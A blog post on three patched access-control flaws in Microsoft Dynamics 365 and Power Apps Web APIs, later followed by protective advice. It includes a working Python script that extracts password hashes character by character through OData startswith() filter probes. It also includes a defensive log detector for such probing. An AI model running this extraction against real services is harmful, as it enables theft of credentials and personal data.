Microsoft Dynamics 365 and Power Apps are popular tools used by businesses worldwide. They help manage customer data, streamline operations, and improve productivity. However, recent findings reveal severe security vulnerabilities in their Web APIs. These flaws could have led to serious data breaches if left unaddressed.
Cybersecurity company Stratus Security discovered these vulnerabilities and reported them to Microsoft. Thankfully, Microsoft patched these issues in May 2024.
This blog explains the vulnerabilities, their impact, and the importance of constant cybersecurity vigilance.
The Discovery of Security Flaws
Based in Melbourne, Stratus Security identified three major security flaws in the Dynamics 365 and Power Apps Web APIs. Two of these flaws were in the OData Web API's handling of query options (the filter and the orderby clause), and the third was in the FetchXML API. All three let a caller learn the contents of columns they were not permitted to read, exposing sensitive user data.
The First Vulnerability: OData Web API Filter Access Control
The first vulnerability was a missing access-control check on the OData Web API Filter. A caller could apply filter conditions to columns of the contacts table that they had no permission to read, and the response (rows returned or not) revealed whether the condition was true. The contacts table stores critical information such as names, phone numbers, addresses, financial details and password hashes (the adx_identity_passwordhash column).
Because each query answers only yes or no, an attacker could mount a boolean-based search: guess the password hash one character at a time by asking whether the hash starts with a given prefix, and extend the prefix by one character on every confirmed guess.
For instance, the attacker begins by querying whether the password hash starts with a specific letter, then appends the next candidate letter, and repeats this process until they have discovered the complete password hash.
Stratus Security demonstrated this attack with the following example:
- First, they queried with "startswith(adx_identity_passwordhash, 'a')" (the OData function is spelled in lower case).
- Next, having confirmed the first character, they refined the query to "startswith(adx_identity_passwordhash, 'aa')".
- They continued this process, one character per confirmed guess, until they had identified the complete password hash.
Each query leaks only one bit, but enough queries recover the whole value, so an attacker could extract sensitive data without ever being granted read access to the column.
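The extraction loop described above, written out as an added example (this is not Stratus Security's code, and the environment URL, the bearer token and the base64 alphabet for the stored hash are assumptions). The mock oracle stands in for the unpatched service so the script runs offline; the HTTP oracle shows the request shape that was actually sent to the Web API.

```python
import json
import string
import urllib.request
from typing import Callable
from urllib.parse import quote

# Hypothetical Dataverse environment (assumed URL, not from the write-up).
BASE_URL = "https://example.crm.dynamics.com/api/data/v9.2"
TABLE = "contacts"
COLUMN = "adx_identity_passwordhash"   # the column Stratus Security probed

# Characters tried at each position. The portal password hash is assumed to be
# base64 text, so this alphabet is an assumption about the stored format.
ALPHABET = string.ascii_letters + string.digits + "+/="

Oracle = Callable[[str], bool]   # prefix -> True if at least one row matched


def build_filter(prefix: str, target_filter: str = "") -> str:
    """OData $filter asking "does COLUMN start with <prefix>?".
    A single quote inside an OData string literal is escaped by doubling it.
    target_filter (e.g. a condition on emailaddress1) pins the probe to one
    contact, so the answer is about the victim's hash and not any row's."""
    literal = prefix.replace("'", "''")
    flt = f"startswith({COLUMN},'{literal}')"
    return f"{target_filter} and {flt}" if target_filter else flt


def build_probe_url(prefix: str, target_filter: str = "") -> str:
    """Full request URL; $top=1 keeps the response tiny, since only
    'empty or not' matters. Characters such as '+' must be percent-encoded."""
    flt = quote(build_filter(prefix, target_filter), safe="(),'=@")
    return f"{BASE_URL}/{TABLE}?$select=contactid&$filter={flt}&$top=1"


def make_http_oracle(token: str, target_filter: str) -> Oracle:
    """Oracle backed by real HTTP requests (needs a bearer token; not run here)."""
    def oracle(prefix: str) -> bool:
        req = urllib.request.Request(
            build_probe_url(prefix, target_filter),
            headers={"Authorization": f"Bearer {token}",
                     "Accept": "application/json",
                     "OData-MaxVersion": "4.0", "OData-Version": "4.0"})
        with urllib.request.urlopen(req) as resp:
            return len(json.load(resp)["value"]) > 0
    return oracle


def make_mock_oracle(secret: str) -> Oracle:
    """Stand-in for the unpatched service: the filter is evaluated against a
    column the caller cannot read, and the caller only sees whether rows came
    back. Constructed for offline use."""
    def oracle(prefix: str) -> bool:
        return secret.startswith(prefix)
    return oracle


def extract_value(oracle: Oracle, alphabet: str = ALPHABET, max_len: int = 256) -> str:
    """Boolean-based, one-character-at-a-time extraction.

    Each round appends the first alphabet character the oracle confirms. When
    no character extends the prefix, either the whole value has been recovered
    or the next character is outside the alphabet; either way we stop."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            if oracle(known + ch):
                known += ch
                break
        else:            # no character matched: nothing more to learn
            break
    return known


if __name__ == "__main__":
    # Constructed secret; against the mock this recovers the full value.
    print(extract_value(make_mock_oracle("AQAAAAEAACcQAAAAEMYoWqSh")))
```

The cost is at most one request per alphabet character per position, so a 100-character hash costs only a few thousand tiny requests; the `max_len` guard and the early stop on an unmatched character are what keep the loop from running forever when the column holds a character outside the assumed alphabet.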
The Second Vulnerability: Exploiting the Orderby Clause
The second vulnerability involved the "orderby" clause in the OData Web API Filter. Attackers could use this clause to extract information from specific columns they were not supposed to read, for example the column holding contacts' primary email addresses.
The exposure was not limited to email addresses: once attackers had the addresses, they could correlate them with other stolen data, increasing the damage potential.
The Third Vulnerability: FetchXML API Access
The third vulnerability was in the FetchXML API, where crafted queries bypassed the same access controls. Unlike the OData orderby vulnerability, this one did not require the ordering to be descending, and that extra flexibility made the FetchXML exploit even more dangerous.
Attackers could use it to read restricted columns in the contacts table, retrieving email addresses, password hashes, and other confidential information. Once compiled, such data can be sold, or the hashes cracked offline.
The Impact of These Vulnerabilities
If attackers exploited these flaws, the consequences could have been devastating. Hackers could have stolen sensitive data, including names, email addresses, phone numbers, and password hashes. This data could then be used for phishing attacks, identity theft, or sold on the dark web.
For businesses relying on Dynamics 365 and Power Apps, this breach would mean a loss of customer trust and potential legal consequences. Data breaches can result in significant financial losses, regulatory penalties, and reputational damage.
Microsoft’s Response and Patches
Microsoft acted quickly after receiving the report from Stratus Security and had patched all three vulnerabilities by May 2024. These updates prevent unauthorized access and protect sensitive data from future attacks. Because Dynamics 365 and Power Apps are cloud services, the fixes were deployed by Microsoft within the service; customers of the online service have nothing to install, but should confirm their environments are current and review their table and column-level permissions.
Lessons Learned
The discovery of these vulnerabilities highlights the importance of regular security audits. Even the most trusted platforms can have hidden flaws. Businesses must prioritize cybersecurity to protect their data and their customers.
Stratus Security’s findings serve as a reminder that constant vigilance is key. Cybercriminals are always looking for weaknesses to exploit. Staying updated with patches and investing in security measures is essential.
How to Protect Your Business
If you use Microsoft Dynamics 365 or Power Apps, take these steps to safeguard your data:
- Always install the latest security updates.
- Regularly audit your systems for potential vulnerabilities.
- Train your staff on best cybersecurity practices.
- Apply least-privilege table and column permissions so users can reach only the data they need.
- Monitor your systems for unusual activity, such as one account issuing long runs of filter queries against sensitive columns.
These measures can reduce the risk of data breaches and ensure your systems remain secure.
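One way to act on the monitoring advice, as an added example that is not from the original article or from Stratus Security: a detector that reads per-request logs of the Web API and flags a caller whose startswith() literals on a sensitive column form a growing prefix chain ('A', 'AQ', 'AQA', ...), which is the signature of character-by-character extraction. It assumes you can obtain request logs carrying the caller and the query string (for example from a proxy or gateway in front of the API); the "<user> <method> <url>" line format and the sample log are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, quote, urlsplit

# Columns whose values should never be enumerated by filter probing.
SENSITIVE_COLUMNS = {"adx_identity_passwordhash", "emailaddress1"}
THRESHOLD = 8   # nested prefixes ('A', 'AQ', 'AQA', ...) from one caller before alerting

# startswith(<column>,'<literal>'), allowing OData's doubled-quote escape inside the literal
STARTSWITH_RE = re.compile(r"startswith\((\w+),'((?:[^']|'')*)'\)")


def constructed_sample_log() -> str:
    """Synthetic request log, one "<user> <method> <url>" per line (constructed
    data, not real logs): two ordinary users plus one account walking the
    password-hash column one character at a time, with two misses per hit."""
    lines = [
        "alice@example.com GET /api/data/v9.2/contacts?$select=fullname,emailaddress1&$top=5",
        "bob@example.com GET /api/data/v9.2/contacts?$select=contactid"
        "&$filter=startswith(emailaddress1,%27bob%27)",
    ]
    recovered = ""
    for ch in "AQAAAAEAACcQ":           # constructed 'hash' being extracted
        for guess in ("x", "7", ch):
            lit = quote(recovered + guess, safe="")
            lines.append("probe@example.com GET /api/data/v9.2/contacts?$select=contactid"
                         f"&$filter=startswith(adx_identity_passwordhash,%27{lit}%27)&$top=1")
        recovered += ch
    return "\n".join(lines)


def parse_line(line: str):
    """Split one log line into (user, percent-decoded $filter or '')."""
    user, _method, url = line.split(maxsplit=2)
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return user, params.get("$filter", [""])[0]


def probes_in(flt: str):
    """All (column, literal) pairs from startswith() calls in a $filter."""
    return [(col, lit.replace("''", "'")) for col, lit in STARTSWITH_RE.findall(flt)]


def find_enumeration(log_text: str, threshold: int = THRESHOLD) -> list:
    """Flag (user, column) pairs whose startswith literals form a prefix chain.

    A genuine search such as startswith(emailaddress1,'bob') yields a chain of
    length 1. Character-by-character extraction leaves 'A', 'AQ', 'AQA', ...
    in the log, so some literal has nearly every one of its prefixes present.
    Responses are not needed: the request shape alone gives the signal."""
    literals = defaultdict(set)          # (user, column) -> distinct literals seen
    requests = defaultdict(int)          # (user, column) -> number of probes
    for line in log_text.splitlines():
        if not line.strip():
            continue
        user, flt = parse_line(line)
        for col, lit in probes_in(flt):
            if col in SENSITIVE_COLUMNS:
                literals[(user, col)].add(lit)
                requests[(user, col)] += 1
    alerts = []
    for key in sorted(literals):
        lits = literals[key]
        chain = max(sum(1 for k in range(1, len(l) + 1) if l[:k] in lits) for l in lits)
        if chain >= threshold:
            user, col = key
            alerts.append({"user": user, "column": col,
                           "requests": requests[key], "chain_length": chain})
    return alerts


if __name__ == "__main__":
    for alert in find_enumeration(constructed_sample_log()):
        print(alert)
```

The threshold is deliberately on chain length rather than raw request count, so a busy but legitimate integration that issues many unrelated prefix searches is not flagged, while an extraction run of even a short value is. Extend `SENSITIVE_COLUMNS` to whatever your environment treats as restricted, and remember that an attacker can spread probes across accounts or sessions, so this is one signal to correlate, not a complete control.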
Conclusion
The vulnerabilities in Microsoft Dynamics 365 and Power Apps Web API underline the importance of cybersecurity. Thanks to Stratus Security’s research, these flaws were identified and patched before causing significant harm. However, this incident highlights the need for businesses to remain proactive in protecting their data.
Staying informed about security risks and applying updates promptly is crucial. Cybersecurity is a shared responsibility, and vigilance is the best defense against evolving threats.
By following best practices and staying alert, businesses can ensure their data remains safe. The lessons from this incident are clear: constant vigilance and prompt action can prevent devastating cyberattacks.